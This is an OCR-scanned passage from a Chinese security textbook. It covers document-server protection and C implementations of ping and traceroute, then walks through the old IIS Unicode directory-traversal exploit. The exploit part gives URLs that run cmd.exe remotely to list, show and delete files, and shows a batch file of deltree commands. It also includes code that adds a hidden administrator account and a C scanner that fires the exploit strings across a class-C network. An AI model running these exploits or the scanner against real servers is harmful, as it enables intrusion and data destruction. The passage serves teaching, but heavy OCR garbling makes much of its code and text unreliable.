TRIP 数据 库 是 由 记录 组 成 的 ,记录 又 由 字段 组 成 。 一 个 记录 中 的 字段 数量 不 限 。TRIP 
的 记录 字段 ， 按 数据 类 型 分 有 7 种 。 它 们 是 文本 、 词 组 、 整 数 、 实 数 、 日 期 、 时 间 和 字符 
串 。 图 像 、 图 表 及 其 他 二 进 制 数据 放 到 字符 串 (string) 字 段 。 文 本 类 型 字段 可 进一步 分 成 带 
序号 的 段 、 句 和 词 ， 检 索 时 可 在 指定 的 段 、 句 、 词 中 查找 。 词 组 、 整 数 、 实 数 、 日 期 、 时 
间 等 数据 类 型 可 再 分 成 带 序号 的 子 字段 , 即 所 谓 允 许 重复 。 比 如 ,作者 名 选用 词组 类 型 时 ， 
这 一 个 作者 字段 允许 放任 意 多 个 名 字 ， 每 个 名 字 占 用 一 个 子 字段 。 在 TRIP 中 ， 一 个 库 中 
的 记录 数 是 没 上 限 的 ; 每 个 记录 的 长 度 是 不 限 的 ; 每 记录 的 段 数 、 字 段 数 、 段 落 、 句 子 数 
和 词 的 个 数 也 没有 上 限 ， 文本 字段 的 段落 、 句 子 、 词 的 长 度 也 不 受 限 ， 除 字符 串 字段 外 ， 
其 余 字 段 的 内 容 均 可 做 倒 排 ， 即 可 被 快速 查找 。 加 上 字符 串 字段 能 存放 二 进 制 数据 ，TRIP 
是 一 个 真正 的 多 媒体 全 文 数据 库 系 统 。 


3. 文件 服务 器 的 安全 


这 里 以 紫光 慧 图 的 U-DMS 为 例 来 说 明 如 何 保护 文件 服务 器 上 文件 的 安全 。U-DMS X 
取 了 以 下 措施 : 

(1) 多 级 权限 控制 ， 防 止 资料 泄密 。 

由 于 设计 作品 、 专 利 等 文档 的 重要 性 ，U-DMS 文档 管理 系统 已 为 设计 院 设置 了 一 套 
完善 的 权限 控制 体系 ， 防 止 文档 资料 泄密 。 可 针对 系统 、 每 个 模块 、 每 个 文件 夹 、 每 个 文 
档 进行 单独 的 授权 ， 包 括 多 用 户 角 色 、 多 级 的 查看 控制 。 

(2) 配置 审计 机 制 ， 追 踪 文档 操作 历史 记录 。 

系统 用 户 对 文档 的 所 有 操作 都 会 自动 记录 在 文档 的 操作 历史 中 ， 包 括 文档 的 修改 、 权 
限 分 配 、 移 动 、 复 制 、 下 载 、 打 印 、 上 传 新 版 本 、 删 除 、 还 原 等 所 有 操作 都 会 记录 在 系统 
中 。 管 理 者 可 通过 操作 历史 ， 查 询 所 有 用 户 在 各 时 间 段 内 的 所 有 操作 。 

G) 误 删 还 原 ， 自 动 备份 。 

对 于 设计 研究 院 这 样 的 知识 性 企业 , 文档 管理 系统 的 可 靠 性 非常 重要 。 如果 因为 故障 ， 
导致 无 法 访问 文档 或 者 文档 丢失 , 将 是 致命 的 损失 。U-DMS 文档 为 解决 此 问题 , 实现 了 以 
下 功能 : 

° 采用 RAID 双 硬 盘 镜 像 存 储 阵列 ， 避 人 免 硬 盘 故 障 导致 的 数据 丢失 

° 采用 网 络 磁盘 每 天 自动 备份 ， 可 恢复 到 历史 备份 数据 ; 

° ”所 有 删除 数据 进入 回收 站 ， 可 避免 误 操作 导致 的 数据 丢失 ; 

° 不 被 软件 绑 定 , 即便 脱离 U-DMS 文档 管理 系统 ,仍然 可 以 直接 通过 文件 系统 访问 

这 些 文档 。 
(4) 文件 加 密 
数据 存储 过 程 中 ， 经 过 硬件 加 密 设备 安全 处 理 后 ， 存 储 在 服务 器 上 的 数据 信息 为 密 文 
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形式 ， 而 密 钥 存储 在 加 密 设 备 内 ， 和 密 文 分 开 存储 ， 而 且 每 个 文件 对 应 一 个 密 钥 。 通 过 
U-DMS 系统 访问 时 ， 系 统 自动 解密 ， 直 接 从 服务 器 端 无 法 查看 密 文 形式 的 数据 信息 。 


5.5 小 结 


本 章 重 点 介绍 了 键盘 输入 的 安全 ， 文 件 外 发 控制 、 安 装 软件 后 如 何 禁止 用 户 卸 载 安全 
软件 的 一 些 措施 。 另 外 还 介绍 了 透明 加 密 的 一 些 基本 知识 ， 引 入 了 非 结 构 化 数据 管理 和 管 
理 数据 库 TRIP。 


5.6 习题 


1. 假设 要 设置 某 个 文件 目录 的 文件 为 只 读 ， 而 且 不 能 被 删除 ， 应 如 何 实现 ? 

2. 结合 本 章 知识 和 ASP 知识 ， 建 立 一 个 网 页 ， 只 有 当 两 个 用 户 同时 登录 时 ， 才 能 对 
文件 服务 器 上 的 文件 进行 删除 操作 。 

4. 文件 外 发 控制 如 何 绑 定 一 台 计 算 机 ? 如 何 绑 定 一 个 USB 盘 ? 

5. 文件 外 发 如 何 进行 时 间 控制 ? 注意 : 本 机 时 间 是 可 以 改变 的 , 还 可 以 在 启动 时 通过 
BIOS 中 修改 。 

6. 了 解 一 下 TRIP， 对 比 SQL Server， 简 述 各 自 的 优势 和 用 途 。 
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本 章 介绍 如 何 对 数据 加 密 ， 主 要 内 容 如 下 : 
。 最 常用 的 网 络 命令 的 实现 ; 

° 举例 说 明 网 络 攻击 是 怎么 实现 的 ; 

° 防火墙 的 简单 实现 ， 

© OpenSSL 的 利用 。 


61 常用 网 络 命令 的 实现 


常用 的 网 络 命令 有 IpConfig( 取 IP 地 址 )、Ping( 验 证 远程 计算 机 的 连接 状况 )、Tracert( 路 
由 跟踪 )、Netstat( 显 示 协 议 统计 和 当前 的 TCP/IP 网 络 连接 )、Net 命令 (管理 网 络 环境 、 服 
务 、 用 户 、 登 录 等 本 地 信息 )、Telnet 实现 远程 登录 、Armp 显示 和 修改 “地 址 解析 协议 ”。 
Ftp 将 文件 传送 到 正在 运行 Ftp 服务 的 远程 计算 机 , 或 从 正在 运行 Ftp 服务 的 远程 计算 机 
下 载 文件 。Tfip 将 文件 传输 到 正在 运行 Tftp 服务 的 远程 计算 机 ， 或 从 正在 运行 Tfp 服务 
的 远程 计算 机 接收 文件 。 

1. 实现 Ping 


Ping 利用 ICMP 协议 ， 向 目的 计算 机 发 送 自我 构造 的 ICMP 数据 报 实现 。ICMP 是 
Internet Control Message Protocol(Internet 控制 消息 协议 ) 的 缩写 。 它 是 TCP/IP 协议 族 的 一 个 
子 协议 ， 用 于 在 下 主机、 路 由 器 之 间 传递 控制 消息 。 控制 消 息 是 指 网 络 通 不 通 、 主 机 是 否 
可 达 、 路 由 是 否 可 用 等 网 络 本 身 的 消息 。 这 些 控制 消息 虽然 并 不 传输 用 户 数据 ， 但 是 对 于 
用 户 数据 的 传递 起 着 重要 的 作用 。 

在 网 络 中 经 常会 使 用 到 ICMP 协议 。 比 如 经 常 使 用 的 用 于 检查 网 络 通 不 通 的 Ping 命令 ， 
这 个 “Ping” 的 过 程 实际 上 就 是 ICMP 协议 工作 的 过 程 。 还 有 其 他 的 网 络 命令 如 跟踪 路 由 
的 Tracert 命令 也 是 基于 ICMP 协议 的 。 

代码 实现 过 程 为 : 

0) 建立 原始 套 接 字 。 只 有 原始 状态 套 接 字 才 可 以 自我 设置 报头 。 

(2) 发 送 自 我 构造 数据 报头 的 数据 报 .实际 上 Ping 是 向 目标 发 送 一 个 要 求 回 显 (Typ = 8) 
的 ICMP 数据 报 ， 当 主机 得 到 请 求 后 ， 再 返回 一 个 回 显 (Type = 0) 数 据 报 。 

(3) 接收 并 分 析 返 回 的 数据 报 。 

代码 如 下 : 

#include "stdafx.h" 
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#include "zssPing.h" 

#ifdef DEBUG 

#define new DEBUG NEW 

#undef THIS FILE 

static char THIS FILE[] = FILE `: 
#endif 

include <stdio.h> 

#include <string.h> 

#include <winsock2.h> 
#pragma comment( lib, "ws2 32") 
typedef struct ip hdr /定义 他 首部 
{ 


unsigned char h verlen; /4 位 首部 长 度 .4 位 下 版 本 号 
unsigned char tos: /8 位 服务 类 型 TOS 
unsigned short total len: 116 位 总 长 度 ( 字 节 ) 
unsigned short ident; //16 位 标识 

unsigned short frag_and flags: /3 位 标志 位 

unsigned char ttl; /8 位 生存 时 间 TTL 
unsigned char proto: //8 位 协议 (TCP, UDP 或 其 他 ) 
unsigned short checksum: 1/16 fir IP PE BBE A 
unsigned int sourceIP: //32 位 源 ১01 

unsigned int destP; /32 EFL ft) TP 地 址 

)IP HEADER: 


typedef struct icmp hdr 
{ 


BYTE i type: /ICMP 报 文 类 型 
BYTE i code: // ICMP 代码 
USHORT i cksum: / 校 验 和 
USHORT iid: / 标志 符 
USHORT i seq; / 序号 
ULONG timestamp: / 时 间 戳 

) ICMP HEADER: 

//CheckSum: 计 算 校 验 和 的 子 函 数 


USHORT checksum(USHORT *buffer int size) 
{ 

unsigned long cksum-0: 

while(size >1) 

{ 

cksum+=*buffer++: 

size --sizeof(USHORT): 

) 

这 size ) //3% size 为 奇数 

t 
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cksum += *(UCHAR*)buffer: 

) 

cksum = (cksum >> 16) + (cksum & 00: 
cksum += (cksum >>16): 

return (USHORT)(-cksum): 

) 

void useage() 

t 

prip tf aaaea aeaaaee g); 
printf("ICMPPing\n"); 

printf("Useage: ZssPing.exe Target ip n"): 
printf( eek ooo ko o ao o o o Eo o HR nn): 
) 

//buf 为 接收 到 的 数据 报 ，len 为 报 长 度 
void DecodeHeader(char* buf, int len) 

€ 

ICMP HEADER  *icmpHeader; 

IP HEADER  *ipHeader; 

IN ADDR addr; 

icmpHeader = (CMP HEADER *)(buf*20): 
DWORD Timel: 

Timel = GetTickCount(): /开始 时 间 


ipHeader -(IP HEADER*)malloc20); — //IP 头 是 20 个 字 节 长 


memcpy(ipHeader, buf, 20): 

addr.S un.S addr = ipHeader-»sourceIP: 
if(cmpHeader-i type '- 0) /一 0， 则 回答 了 ， 和 否则 没有 
{ 

printf("No replay!n"); 

) 

if (icmpHeader->i_id != (USHORT)GetCurentProcessIdO) 

f 

printf("other socket!\n"): 

) 


printf("Reply from %s: Bytes= 9৫ ", inet ntoa(addr), len): /返回 报 的 IP 
printf("TTL = %d Time= %d ms.\n", ipHeader->ttl, Time1-icmpHeader->timestamp ): 


/时 间 段 

CWinApp theApp: 

using namespace std: 

int _tmain(int argc, TCHAR* argv[]. TCHAR* envp[]) 
t 

int nRetCode = 0: 

// initialize MFC and print and error on failure 


if ('AfxWinInit(::GetModuleHandle(NULL), NULL. ::GetCommandLine(. 0)) 


t 
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// TODO: change error code to suit your needs 
cem << T('Fatal Error: MFC initialization failed") << endl; 
nRetCode = 1: 

) 

else 

{ 

ICMP HEADER icmpHeader: 

int rect; 

WSADATA WSAData; 

SOCKET sock; 

SOCKADDR IN addr in.addr from: 

char recvbuf[1024]: 


useageQ: 
if (argc!=2) 
{ exit(0): ) 


if (WSAStartup(MAKEWORD(2.2), &WSAData) != 0 ) 
{ printf ("WSAStartup 801), 
exit(0): 
) 
/SOCK RAW 为 设置 原始 套 节 字 ， 那 么 用 户 可 以 自己 设置 发 送 他 数据 报 的 头 
/PPROTO_ICMP 表示 ICMP 数据 报 
sock- socket(AF INET, SOCK RAW, IPPROTO ICMP): 
int nTimeOut = 2000; /超时 毫秒 
/设置 发 送 超时 和 接收 超时 
setsockopt(sock, SOL SOCKET, SO_SNDTIMEO. (char*)&nTimeOut, 
sizeof(nTimeOut)); 
setsockopt(sock, SOL SOCKET, SO RCVTIMEO, (char*)&nTimeOut, 
sizeof(nTimeOut)); 
memset(&addr in, 0. sizeof(addr in): 
addr in.sin family = AF INET: /为 网 络 地 址 类 型 .一 般 为 AF INET 
addr in.sin addrS_un.S_addr = inet addr(argv[1]): //IP 
/对 发 送 ICMP 数据 报 不 需要 设 定 端口 
/判断 是 域名 还 是 认 地 址 。 若 为 域名 inet_addr(argv[1]) 返 回 值 为 FFFFFFFF 
if (addr in sin_ addrS un.S_addr = INADDR NONE) // 车 为 255.255.255.255 
{ /INADDR_NONE 是 32 位 均 为 1 的 值 ( 即 255.255.255.255. 它 是 Intemet 的 广播 地 址 ) 
struct hostent *host = NULL: /hostent 为 标识 一 个 主机 与 P 的 列表 
if ((host = gethostbyname(argv[1])) != NULL) ( /获取 argv[1] 的 主机 与 IP 列表 
// 车 有 多 个 网 卡 ， 可 能 有 多 个 人 P 
memcpy(&(addr in.sin addr). host->h addr, host->h length): //host->h addr 为 域名 

CString in: 

in.Format("%X".(DWORD)host->h addr): 

AfxMessageBox(in): 
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// . AfxMessageBox(host--h addr): 


) 
) 
/设置 数据 报头 
memset(&icmpHeader, 0. sizeof(icmpHeader)): 
icmpHeaderi type = 8: /要 求 回 显 ， 即 ICMP ECHO 


icmpHeaderi code — 0: 

icmpHeaderi cksum = 0: 

icmpHeader.i_id = (USHORT)GetCurrentProcessId(): 

icmpHeader.i_seq = 0: 

icmpHeader.timestamp = GetTickCount(); 

icmpHeader.i_cksum = checksum((USHORT*)&icmpHeader, sizeof(icmpHeader)): 

/发 送 一 个 icmpHeader 

rect = Sendto(sock (char*)&icmpHeader, sizeof(icmpHeader) 0， (sockaddr*)&addr in, 
sizeof(addr in)): 

intaddr from len: 

addr from len — sizeof(addr from); 

// 接 收 的 数据 报 为 全 头 HCMP 头 

rect = recvfrom(sock, recvbuf, sizeof(recvbuf), 0. (sockaddr*)&addr from, &addr from len): 

/rect 为 接收 的 字 节 数 

DecodeHeader(recvbuf, rect); 

closesocket(sock); 

WSACleanupO: 

) 

return nRetCode; 

) 


2. 取 本 机 IP 地址 
获取 本 机 IP 地 址 可 以 使 用 套 接 字 函数 实现 ， 代 码 如 下 : 


#include "winsock2.h" 

#pragma comment (lib , "ws2_32.lib") /必须 
void CGetMyIPDlg::OnGetIP() 

t 

WORD wVersionRequested: 

WSADATA  wsaData: 

char name[255]:/ 定 义 用 于 存放 获得 的 主机 名 的 变量 
PHOSTENT hostinfo: 

wVersionRequested =MAKEWORD( 2. 0 ): 

// 调 用 ws2_32 dll 

WSAStartup( wVersionRequested, &wsaData ): 
/获取 本 地 机 器 的 名 字 到 name 

gethostname ( name, sizeof(name)): 

/根据 机 器 名 字 获 取 机 器 信息 结构 hostinfo 
hostinfo = gethostbyname(name): 
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/获取 本 地 了 琴 。h addr list X P 列表 ， 当 有 多 个 网 卡 时 有 多 个 他 
m ip-inet ntoa (*(struct in addr *)*hostinfo->h addr list): 
UpdateData(FALSE): 
) 
3. 路 由 跟踪 实现 
路 由 跟踪 的 作用 是 测试 数据 报到 达 目 的 机 器 经 过 的 路 由 器 。 利 用 ICMP 协议 ， 向 目的 


计算 机 发 送 多 个 自我 构造 的 ICMP 数据 报 ， 而 且 每 个 数据 报 含有 不 同 TTL(Time To Live) 
值 ， 然 后 分 析 返 回 的 数据 报 而 实现 。 
ICMP 结构 中 字段 ype 有 以 下 几 种 类 型 


0= 正常 的 应 答 包 

3= 目的 主机 不 可 到 达 

8- 回答 请 求 

11=TIL 过 期 (数据 报 超时 ) 
17= 地 址 掩 码 请 求 

18 = 地 址 掩 码 应 答 


沿 着 整个 路 由 路 径 , 每 个 所 经 的 路 由 器 (可 能 是 一 台 主 机 , 也 可 能 是 一 台 专 门 的 路 由 器 ) 
将 其 收 到 的 数据 包 中 的 TTL 值 减 一 后 才 转 发 到 下 一 路 由 器 ， 所 以 实际 上 TTL. 可 以 被 看 作 
是 一 个 所 经 路 由 站 点 的 计数 器 。 当 该 TIL 值 为 0 时 , 通常 路 由 器 就 会 送 回 一 个 ICMP 过 期 
消息 给 程序 (该 ICMP 应 答 包 的 类 型 = 11)。 

路 由 跟踪 原理 如 下 : 首先 它 发 送 一 个 TIL 值 为 1 的 数据 包 , 然后 在 后 续 的 传送 过 程 中 
逐次 给 要 发 送 的 数据 包 的 TTL 值 加 1， 直到 最 终 收 到 一 个 类 型 为 0 的 ICMP 应 答 包 , 或 达 
到 了 用 户 设 定 的 最 大 路 由 数 限 制 。 通 过 检查 传输 过 程 中 中 继 路 由 器 送 回 的 ICMP 过 期 消息 
程序 就 可 确定 一 个 路 由 表 。 请 注意 有 些 路 由 器 会 自动 删除 TTL. 值 为 0 的 数据 包 , 因此 这 些 
路 由 器 是 无 法 被 跟踪 的 (在 输出 窗口 看 到 一 行 类 似 “ 目 标 主机 无 响应 ”的 消息 )。 输 出 结果 
中 所 显示 的 主机 名 是 通过 使 用 默认 DNS 服务 器 解析 出 来 的 。 主 要 代码 如 下 : 


#include "ws2tcpiph" — //IP TTL 的 定义 在 该 文件 
#include "winsock2.h" 

#pragma comment (lib , "ws2 32.lib") 

BOOL CICMP::SendICMPPack(sockaddr in *pAddr) 
t 

// 填 充 ICMP 数据 各 项 

int state; 

char *p data: 

m plemp-type-ICMP ECHO: /8， 要 求 回 显 。m_pIcmp 为 ICMP 结构 
m plcmp->code = 0: 

m plcmp->ID = (USHORT)GetCurrentProcessIdO: 

m plcmp->number = 0: 

m plcmp->time = GetTickCount(): 
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m plcmp->cksum = 0; 
// 填 充 数 据 。ICMP 大 小 为 20 字 节 
p data = ((char *)m plcmp + sizeof(ICMP HEAD)): 
/常量 DEF PACKET-32 
memset((char *)p data;0DEF PACKET):// 在 m plcmp 后 添 充 32 个 字符 
/检查 和 
m plcmp->cksum = CheckSum((USHORT *)m plcmp. DEF PACKET+ 
sizeof(ICMP HEAD)): 
RIEM, pAddr 为 目的 他 结构 
state = sendto(winsock (char *)m plemp.DEF PACKET+sizeofICMP HEAD), 
NULL (struct sockaddr *)pAddr.sizeof(sockaddr)): 
if(state — SOCKET ERROR) í 
if(GetLastError()—WSAETIMEDOUT) 
m strinfo = "连接 超时 !( 发 送 )"; 
else m_strInfo=" 出 现 未 知 发 送 错误 !": 
return FALSE: 
) 
if(state «DEF PACKET) { /发 送 的 字 节 数 小 于 32 
m strInfo = "发 送 数 据 错误 1"; 
return FALSE; 
) 
memcpy((void *)&m sockAddr.(void *)pAddr,sizeof(sockaddr in)): 


return TRUE: 
} 
人 = = 
BOOL CICMP::RecvICMPPack0 
{ 


int state; 
int len = sizeof(sockaddr in): 
char * addr; 
struct hostent *IpHostent = NULL: 
addr = inet ntoa(m sockAddr.sin addr): 
state = recvfrom(winsock.(char *)m pIp.MAX PACKET.0. 
(struct sockaddr*)&m sockAddr.&len): 
if (state = SOCKET ERROR) { 
if (WSAGetLastError() = WSAETIMEDOUT) 
t 
m_strInfo.Format(" 接 收 超时 .路 由 跟踪 失败 1"); 
routestate=0; 
RouteState=" 路 由 跟踪 失败 1"; 
} 
else 
m_strInfo = "未 知 接收 错误 1"; 
retum FALSE; 
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) 

/分 析 数据 

int ipheadlen: 

ipheadlen =m plp--HeadLen * 4 : 

if (state < (ipheadlen-MIN PACKET)) (//state 为 接收 数据 长 度 
m strInfo = "目的 地 址 的 响应 数据 不 正确 ": 


return FALSE; 
) 
ICMP_HEAD * p_icmprev: 
/定位 指针 到 接收 数据 的 ICMP 开始 处 


p iemprev = (ICMP HEAD*)((char *)m plp + ipheadlen); 
switch (p icmprev-^type) í 
caseICMP ECHOREPLY: // 收 到 正常 回 显 ， 即 0 
í 
m_strInfo.Format(" 接 收 到 %s %4 字 节 响应 数据 .响应 时 间 :%dms.", 
inet_ntoa(m sockAddr.sin addr).len.GetTickCount()-p_icmprev->time); 
routeaddr=addr: 
routestate=0; 
RouteState=" 到 达 目 的 主机 !"; 
return TRUE: 
break: 
j 
caseICMP TTLOUT: //TIL 超时 ，=11 
{  routeaddr-inet ntoa(m sockAddr.sin addr): 
routestate-1: 
RouteState=" 测 试 到 路 由 器 1"; 
return TRUE: 
break; 
} 
caseICMP DESUNREACH: // 目 的 不 可 达 ，=3 
í ”m_strInfo=" 目 的 不 可 达 !"; 


routestate=0: 
RouteState=" 目 的 不 可 达 !"; 
return TRUE; 
break: 
) 
default : 


{ routestate-0: 
m_sttInfo=" 未 知 错误 !"; 
RouteState=" 不 明 状态 !": 


retum TRUE: 
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4. 模拟 NET 命令 建立 用 户 


Net* 系 列 的 API 函数 可 以 实现 NET 的 功能 ， 这 里 仅 举 例 建 立 用 户 。 主 要 代码 如 下 ， 
结果 如 图 6-1 和 图 6-2 所 示 。 


void CGetUsersDlg::OnCreateUser() 
{ 
wchar t user[100]: // 要 使 用 宽 字符 格式 
wchar t passcode[100]: 
memset(user.0.200): 
memset(user.0.200): 
int lenl=m user.GetLength(): 
int len2=m password.GetLength(): 
inti; 
char *pl-(char*)m user.GetBuffer(0): 
char *p2-(char*)m password.GetBuffer(0): 
/格式 转换 
for(i=0:i<len1:i++)X(char*)user)[2*i]=p1[i]: 
for(i=0;i<len2;i++)((char*)passcode)[2*i]=p2[i]: 
NET API STATUS ret = 0; 
DWORD dwErr = 0; 
USER INFO 1 oUserlInfo: 
ZeroMemory(&oUserlInfo, sizeof(oUserInfo)): 
oUserInfo.usril name = user; 
oUserInfo.usri] password- passcode : 
oUserInfo.usril priv = USER PRIV USER: 
oUserInfo.usri] flags = UF NORMAL ACCOUNT: 
ret = NetUserAdd(NULL. 1, (LPBYTE)(&oUserlInfo), &dwErr): 
if(ret!-NERR Success) { 

AfxMessageBox(" 建 立 账户 失败 1"); 

Teturn: ) 
/将 该 账户 加 入 到 administrators 组 
_LOCALGROUP MEMBERS INFO 3 oUser; 
oUserlgrmi3 domainandname = oUserInfo.usril name: 
ret = NetLocalGroupAddMembers(NULL. L" Administrators", 3, 
(LPBYTE)(&oUser).1): 
) 
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6-1 建立 用 户 


S 计算 机 管理 


| জা mE |e +» alm X S ERI 
| 


Backup Operators 备份 操作 员 为 了 备份 或 还 原文 件 ..… 
Guests 按 默 认 值 ， 来 宾 跟 用 户 组 的 成 员 … 
Power Users 权限 高 的 用 户 拥有 最 高 的 管理 梭 … 
Replicator 支持 域 中 的 文件 复制 

Users 用 户 无 法 进行 有 意 或 无 意 的 改动 … 
ZIXUN-KN8T2565] Admins ZIXUN-KN8TZ565] 管理 员 - RAT... 
ZIXUN-KNSTZS65J Auth... ZIXUN-KN8TZ565] 作者 - জলা... 
ZIXUN-KN8TZ565] Brow... ZIXUN-KN8TZ565] 浏览 者 - RAT... 


Administrator 


2 [Ee 
imo»... | Ly | 


图 6-2 显示 建立 的 结果 


62 ”从 一 个 漏洞 看 网 络 攻击 过 程 


Unicode 漏洞 于 2000 年 10 月 17 日 被 公布 ， 目 前 有 该 漏洞 的 机 器 比较 少 。 在 当时 很 多 
的 攻击 都 是 利用 了 该 漏洞 。Unicode 是 一 种 国际 标准 编码 ， 采 用 两 个 字 节 编码 。 例 如 字符 

a, FH ANSI 格式 ， 为 数据 0x61， 若 用 Unicode 表示 ， 为 数据 0x0061。 当 Windows 
的 HS 打开 文件 时 ， 如 果 该 文件 名 包含 Unicode 字符 ， 它 会 对 其 进行 解码 ， 如 果 用 户 提供 
一 些 特殊 的 编码 ， 将 导致 FS 错误 的 打开 或 者 执行 某 些 Web 根 目录 以 外 的 文件 。 
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1. Unicode 漏洞 的 利用 


例如 对 中 文 版 本 的 Windows 2000 系统 ， 经 过 测试 存在 这 样 的 Unicode 漏洞 ， 在 浏览 
器 中 输入 : 
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
如 果 存 在 Unicode 漏洞 ， 则 会 看 到 硬盘 目录 ， 和 否则 会 显示 “无 法 找到 网 页 ” 
“cmd.exe?/ctdir” 表 示 执 行 目 标 机 器 的 cmd.exe 程序 ， 再 执行 dir 命令 得 到 目录 下 文件 。 
如 图 6-3 所 示 为 执行 后 显示 目录 的 结果 。 
如 果 想 显示 里 面 的 其 中 一 个 un.bat 文本 文件 ， 可 以 这 样 输入 (htm，html，asp，bat 等 
文件 都 是 一 样 的 ): 
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c: \ un.bat 
么 该 文件 的 内 容 就 可 以 通过 正 显示 出 来 。 在 IE 中 虽然 显示 出 错 ， 但 文件 内 容 的 确 
显示 出 来 了 。Type 命令 用 于 以 文本 方式 在 屏幕 上 显示 一 个 文件 的 内 容 。 
输入 其 他 命令 还 可 以 在 目标 机 器 上 执行 程序 、 删 除 文件 和 复制 文件 。 
图 6-3 显示 利用 漏洞 列表 对 方 机 器 上 的 文件 。 图 6-4 显示 利用 漏洞 执行 一 个 程序 ， 并 
删除 对 方 机 器 上 的 文件 。 


[XPO RAOV FEQ RO IRAD RBW 
[*mR--Qi)2 A i dme Sy gin a = 
— 7 


2003-06-06 18:57 1,007 FRUNLOG. TKT 

2003-06-06 18:46 DIR VINDOVS 

2003-07-04 08:53 2. 164 PDOS. DEF 

2003-10-01 09:49 1,701 MSDOS. SYS 
ot 


30 CONFIG.BAK 
<DIR> Ny Documents 
<DIR> Program Files 
m My Music 
8,896 SCANDISK.LOG 
0 usb 


13,030 PDOXUSKS. NET 
DIR HEROSOFT 
7,501 student. txt 
7,854, 010 CAJViewer*.U. zip 
SH 


: um "me 
10 File(s) 0)? 1,880,223 bytes 
7 Dir(s) 1,125,392, 384 bytes free 
DESA 
6-3 ”获取 目标 的 目录 
3 


| ZPO MD আন) পরও) IAD WR — 
|Ha- +- AA Qs umm eR c2 do ৮3৫ 
155: 9) fe) + EEE... < winnt /sy ons?) end eno/ cttrnete Vun bat 


CGI Error 


The specified CCI application misbehaved by not returning a complete 


echo off 
deltree/y ci\ok, exe 

deitres/y e:\logo. sys 
deltree/y c:\0001. sys 
deitree/y c: \0002. rys 
deitree/y c: X0003. sys 
deitree/y c:\0004. sys 
deltree/y c:\0005. sys 
deltree/y c:\0006. sys 
deitree/y c: MUT. sys 
deltree/y c:\0008. sys 
deltres/y 
deitres/y 
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在 目标 机 器 上 传 一 个 文件 后 再 删除 一 个 文件 ， 如 图 6-5 所 示 。 


| 5) REE) EQ EQ IB sq 
| AE + > - OAA Ost uM Qe | 色色 加 -让 2€ 


[EEDS wo NRI nie /vinnty/systen32/end exe?/ctdeltc: \asa exe T 


Directory of c:\ 
i: 型 除 该 文件 

2003-06-06 18:46 DIR WINDOWS 

2003-07-04 08:53 2,164 PDOS. DEF 

2003-10-01 09:49 1, 701 MSDOS. SYS 


图 6-5 删除 目标 机 器 上 的 文件 


2. 扫描 Unicode 漏洞 
下 面 编 个 程序 来 模拟 上 面 的 操作 ， 原 理 是 针对 几 种 存在 该 种 漏洞 的 操作 系统 构造 如 下 
特殊 字符 串 。 原 理 如 图 6-6 所 示 。 
char *exA—"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n; 
char *exB-"GET /scripts/..6c1969c. /winnt/system32/cmd.exe?/c--dir-c: HTTP/1.0 nn": 
char *exC-"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n"; 


char *exD-"GET /scripts/..?oc0962f. /winnt/system32/cmd.exe?/c-*-dir-c^ HTTP/1.0\n\n"; 
char *exE-"GET /scripts/..?oc1969c../winnt/system32/cmd.exe?/c-dir*c^ HTTP/1.0\n\n"; 


由 于 一 般 的 Web 服务 器 使 用 端口 80， 和 服务 器 的 该 端口 建立 连接 后 依次 发 送 上 述 字 
符 串 。 如 果 存 在 Unicode 漏洞 ， 服 务 器 会 返回 字符 串 “HTTP/1.1 200 OK" , 程序 将 全 地 
址 的 扫描 设 定 成 了 一 个 c 段 ， 最 多 扫描 255 个 目标 。 


6-6 Wir 


#include <stdio.h> 

#include <string.h> 

#include <winsock2.h> /必须 包含 的 头 文件 
#pragma comment( lib "ws2 32" /注释 库 文件 
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if(argc!=2)í // 判 断 输 入 的 参数 是 否 带 有 IP 地 址 ， 无 则 返回 
printf("Useage : scan [IP address] (C-class)\n"): 
printf("Example: scan 202.100.2.* OR scan 211.17.65.*n"); 
retur(1): 
) 
int sock: /定义 相关 变量 
struct sockaddr in blah: 
struct hostent *he; 
WSADATA wsaData; 
WORD wVersionRequested-MAKEWORDX, 1): 
char buff[1024]: 
char *exA-"GET /scripts/..?oc1961c../winnt/system32/cmd.exe?/c-*dir*c? HTTP/1.0 mn": 
char *exB-"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 nn"; 
char *exC-"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n"; 
char *exD-"GET /scripts/..?oc0962f. /winnt/system32/cmd.exe?/c--dir-c^ HTTP/1.0 mn"; 
char *exE-"GET /scripts/..?oc1969c. /winnt/system32/cmd.exe?/c-dir*c? HTTP/1.0 nun": 
char *fmsg-"HTTP/1.1 200 OK"; 
char host[1000]: 
char net[1000]: 
inti; 
stmcpy(host.argv[1].999): 
if (host[strlen(host)-1]—"*") host[strlen(host)-1]-0x0: 
10101125617) /扫描 C 类 网 络 ， 循 环 255 次 
{ 
sprintf(net, "%s%d", host, i):// 依次 产生 XXX.XXX.XXX.1--XXX.XXX.XXX.255 的 IP 地 址 
if (WSAStartup(wVersionRequested , &wsaData)){ /调用 WS2 32.DLL 
printf("Winsock Initialization failed. n"): 
exit(1): 
) 
if ((sock=socket(AF INET.SOCK STREAM.0)—INVALID SOCKET)( /建立 套 接 字 
printf("Can not create socket. n"); 
exit(1): 
) 
/填充 目的 套 接 字 结构 的 地 址 信息 
blah sin family = AF_INET: 
blah.sin port = htons(80): // 字 节 顺 序 转换 
blah.sin addr.s addr- inet addr(net): // 将 一 个 点 分 十 进 制 IP 地 址 字符 串 转换 成 32 位 数字 
if((he-gethostbyname(neD)-NULL)( /获得 DNS 信息 
memcpy((char *)&blah.sin addr.s addr.he->h addr.he->h length): 
) 
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/连接 目的 计算 机 的 80 端口 
if (connect(sock.(struct sockaddr*)&blah,sizeof(blah))—0) ( 

send(sockexA.sttlen(exA).0): /发 送 第 1 个 特殊 字符 串 

recv(sock, buff, sizeof(buff).0): /接收 返回 的 信息 

if(strstr(buff. fmsg))-NULL)( /接收 到 "HTTP/1.1 200 OK"， 说 明 存在 漏洞 
printf("\nFound an UNICODE-A hole in %s 9690", net, exA): 

) 

else printf("."): 

send(sockexB,strlenexB).0); /发 送 第 2 个 特殊 字符 串 

recv(sock.buffsizeof(buff).0): /接收 返回 的 信息 

